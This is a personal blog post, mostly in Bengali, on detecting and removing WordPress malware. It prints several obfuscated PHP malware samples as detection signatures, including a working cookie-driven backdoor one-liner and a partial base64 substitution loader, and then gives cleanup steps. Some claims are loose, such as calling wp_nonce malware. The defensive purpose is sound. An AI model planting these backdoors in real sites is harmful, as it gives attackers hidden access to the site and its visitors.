Personal Blog of

Minhazul Asif

Personal Blog of

Minhazul Asif

ওয়েবসাইট ম্যালওয়্যার কি? কিভাবে ওয়েবসাইটের ম্যালওয়ার ডিটেকশন এন্ড রিমুভাল করা যায়?

website malware detect and remove (1)

ওয়েবসাইট ম্যালওয়্যার কি?


ওয়েবসাইট ম্যালওয়্যার হল একটি সফ্টওয়্যার অথবা ম্যালিশিয়াস স্ক্রিপ্ট যা একটি ওয়েবসাইট বা ওয়েব সার্ভারে কাজ করার জন্য খারাপ উদ্দেশ্য নিয়ে তৈরি করা হয়েছে।

এই ধরনের ম্যালিশিয়াস স্ট্রিপ সাধারণত ওয়েবসাইটের back-end থেকে ইউজার তৈরি করতে পারে, ডেটাবেজ এবং যেকোন ফাইলের এক্সপ্রেস নিতে পারে, বারবার ম্যালিশিয়াস স্ক্রিপ্ট রিজেনারেট করে ওয়েবসাইটের ব্যান্ডউইথ নষ্ট করতে পারে। অথবা সার্ভার ডাউন করে দিতে পারে। অনেক সময় ওয়েবসাইটের এক্সিস্টিং ফাইল গুলো নষ্ট করে দিতে পারে এবং ওয়েবসাইট এ Defacement করতে পারে।


ম্যালওয়ার অ্যাটাক হলে ওয়েবসাইটের কি কি ক্ষতি হয়?


● ওয়েবসাইটের চেহারা পরিবর্তন হয়ে যেতে পারে(Defacement)

বিভিন্ন ওয়েবসাইট হ্যাক হওয়ার পর দেখা যায় hacked by অমুক। অথবা ফানি পিকচার হোমপেজে দেখা যায়। অর্থাৎ হ্যাকাররা ওয়েবসাইটটি Defacement করে থাকে।

● হ্যাক হওয়া ওয়েবসাইটে ম্যালিশিয়াস স্ক্রিপ্ট এর মাধ্যমে আমার ওয়েবসাইটের ট্রাফিককে অন্যান্য ওয়েবসাইটে রিডাইরেক্ট করতে পারে।

ব্যাকডোর এর মাধ্যমে আমার অজান্তেই ওয়েবসাইটে লগইন করার জন্য ইউজার তৈরি হতে পারে, আমরা অনেক সময় দেখি ওয়েবসাইটে ডেটাবেজে অনেক আনইউজুয়াল ইউজার অ্যাকাউন্ট থাকে যা সাধারণত ব্যাকডোর এর মাধ্যমে তৈরি করা হয়। হ্যাকাররা এই ইউজার অ্যাকাউন্ট ব্যবহার করে আমাদের ওয়েবসাইটের এক্সেস পেয়ে যায়, ওয়েবসাইটের ফাইল Tampering, ফাইল ডিলিট থেকে শুরু করে পুরা ওয়েবসাইট রিমুভ পর্যন্ত করে দিতে পারে।


ওয়েবসাইটে স্পার্ম কনটেন্ট রাখার মাধ্যমে SEO Spamming সহ কমেন্ট এর মাধ্যমে ব্যাকলিংক স্পামিং হতে পারে। এতে আমাদের ওয়েবসাইট ট্রাফিক নষ্ট হতে পারে। সার্ভার স্লো হয়ে যেতে পারে।


অনেক ম্যালিশিয়াস স্ক্রিপ্ট এর মাধ্যমে ওয়েবসাইটের ব্যান্ডউইথ খুব দ্রুত শেষ হতে থাকে। এবং একটা সময় ওয়েবসাইটটি ডেটাবেজ থেকে ডিসকানেকটেড হয়ে ওয়েবসাইট ডাউন হয়ে যেতে পারে।



ওয়েবসাইটের ম্যালওয়ার ডিটেকশন (WordPress):


● eval()

This attack consists of a script that does not properly validate user inputs in the page parameter. A remote user can supply a specially crafted URL to pass arbitrary code to an eval() statement, which results in code execution.



eval malware


● <?php ${




● base64_decode

Base64 is a simple malware obfuscation technique. The very reason why Base64 encoding is used is because using Base64 it is possible to encode binary data to ASCII string format. Thus, attackers encode data in base64 format and send it over HTTP Protocol. Base64 allows only 64 characters for encoding, hence the name. The characters are –


“=” is used for padding.




● wp_nonce. (it is used to push remote user id and password – CSRF Attack)


wp_nonce malware

wp nonce


● gzdecode_render




● lzw_decompress




● file_upload


file upload malware


● str_replace

This piece of code tries to obfuscate all the functions that could be flagged by a scanner using a benign php function called str_replace. This function replaces all instances of a string with a replacement in the subject.

str_replace malware


● strrev

Using the strrev function on variable allowed the attacker to reverse the string strrev(‘edo’.’c’.’ed_4′.’6e’.’sab’) into base64_decode

strrev malware


● Random string pattern

With random string pattern can always generate random strings and command’s also:

Random string pattern malware


● <?php $OO0__00_OO=urldecode

(PHP Re-Infectors – Example of an infected index.php file that automatically re-generates itself through a malicious process running in the background)

<?php $OO0__00_OO=urldecode malware


● <?php $ca2a = @$GLOBALS[$GLOBALS[‘k94124e4’][48]


<?php $ca2a = @$GLOBALS[$GLOBALS['k94124e4'][48]



● <?php $Icc1ll1l1c=’772′; $I1lcl1cl1c=urldecode. – website redirect


<?php $Icc1ll1l1c='772'; $I1lcl1cl1c=urldecode


● <?php isset(${“\x5f\x47\x45\x54”}[“\x75\x72\x6c\x65\x72\x72”]. – website redirect/ backdoor


backdoor code


● <?php if(isset(COOKIE(“id”)))@$_COOKIE[“user”]($_COOKIE[“id”]); It creates remote users/backdoor


<?php if(isset(COOKIE("id")))@$_COOKIE["user"]($_COOKIE["id"]);


● if (!defined(“FFCBCD”)){define(“FFCBCD”, __FILE__);global


"● if (!defined(""FFCBCD"")){define(""FFCBCD"", __FILE__);global $<81>,$<99><93>"


● <?php
$vNWZ3B7 = Array(‘1’=>’6’, ‘0’=>’e’, ‘3’=>’8′, ‘2’=>’L’, ‘5’=>’v’, ‘4’=>’M’, ‘7’=>’2′, ‘6’=>’s’, ‘9’=>’r’, ‘8’=>’q’, ‘A’=>’l’, ‘C’=>’Y’, ‘B’=>’S’, ‘E’=>’K’, ‘D’=>’n’, ‘G’=>’T’, ‘F’=>’C’, ‘I’=>’y’, ‘H’=>’t’, ‘K’=>’G’, ‘J’=>’9’, ‘M’=>’k’, ‘L’=>’w’, ‘O’=>’H’, ‘N’=>’x’, ‘Q’=>’m’, ‘P’=>’E’, ‘S’=>’j’, ‘R’=>’O’, ‘U’=>’7’, ‘T’=>’4’, ‘W’=>’X’, ‘V’=>’D’, ‘Y’=>’d’, ‘X’=>’Z’, ‘Z’=>’I’, ‘a’=>’z’, ‘c’=>’R’, ‘b’=>’0’, ‘e’=>’B’, ‘d’=>’N’, ‘g’=>’h’, ‘f’=>’P’, ‘i’=>’o’, ‘h’=>’W’, ‘k’=>’c’, ‘j’=>’3’, ‘m’=>’A’, ‘l’=>’a’, ‘o’=>’f’, ‘n’=>’p’, ‘q’=>’F’, ‘p’=>’b’, ‘s’=>’5’, ‘r’=>’g’, ‘u’=>’J’, ‘t’=>’u’, ‘w’=>’U’, ‘v’=>’V’, ‘y’=>’Q’, ‘x’=>’1’, ‘z’=>’i’);
function v5T7ETO($vQF6A3S, $vP8XOME){$v8YITRE = ”; for($i=0; $i < strlen($vQF6A3S); $i++){$v8YITRE .= isset($vP8XOME[$vQF6A3S[$i]]) ? $vP8XOME[$vQF6A3S[$i]] : $vQF6A3S[$i];}
return base64_decode($v8YITRE);}
$vC3WWUF = ‘FQAQEKAak7vbEFcowPJGvq6zC7JMXBuYEBmQuzenkjdAYFrMWxefwxc’.

> for sending spam, DoS

malware wordpress


ওয়েবসাইটের ম্যালওয়ার রিমুভাল:


Before Malware Removal Process:

● First take a backup manual and also with a backup plugin
● Must take a backup of htaccess,wp-config.php, wp-content and
database at list for WP website


Backdoors come in all different sizes. In some cases, a backdoor is as simple as a file name being changed, like this:

● wtf.php
● wphap.php
● php5.php
● data.php
● 1.php
● p.php

The pharma SPAM injection makes use of conditional malware that applies rules to what the user sees. So, you may or may not see the page above, depending on various rules.

pharma spam code

●  in a theme’s index.php file, embedded in legitimate code:

index.php malware

● Prevension : in root .htaccess file add the codes:

<Files *.php>
Deny from All


●  How is it cleaned?

Once you have found a backdoor. malware, cleaning it is pretty easy — just delete the file or code. However, finding the file can be difficult. You can try doing some basic searches for eval and base64_decode or other functions that we have mentioned. or you can use FTP to find and remove malwares.


● Following files are common places where you’ll find link injections:


● wp_blog_header.php (core file)
● index.php (core file)
● index.php (theme file)
● function.php (theme file)
● header.php (theme file)
● footer.php (theme file)


● SEO Spam Injection

Remove the codes manually.

seo spam injection



There is absolutely no reason for a .php file to be living in your uploads directory. Delete any you find.

find php file



Backdoors may have been installed in your unused themes so delete those, including the wordpress ‘default’ and ‘classic’ themes.

inactive theme


sucuri site check



# BEGIN WordPress

RewriteEngine On
RewriteRule .* – [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress



● Database Malware Scan And Removal Process:

● Go to phpmyadmin
● check wp-user table to see unusual users adding
● Copy the malicious script and search on database
● For redirect solving issue, Check wp-options table and recheck Homeurl & siteurl

phpmy admin


To read more ethical hacking blogs click here.

Minhazul Asif

Share on -

Related Articles

minhazul asif

আমি মিনহাজুল আসিফ,

Entrepreneur, Instructor, Web Developer, Freelancer & Cyber Sucurity Expert.

নিজের আইডিয়া গুলো সবার সাথে শেয়ার করার জন্য এই ব্লগ ওয়েবসাইট তৈরী করা। আশা করি আমার ব্লগ পড়ে অনেকেই উপকৃত হবে।

ক্যাটাগরি সমূহ: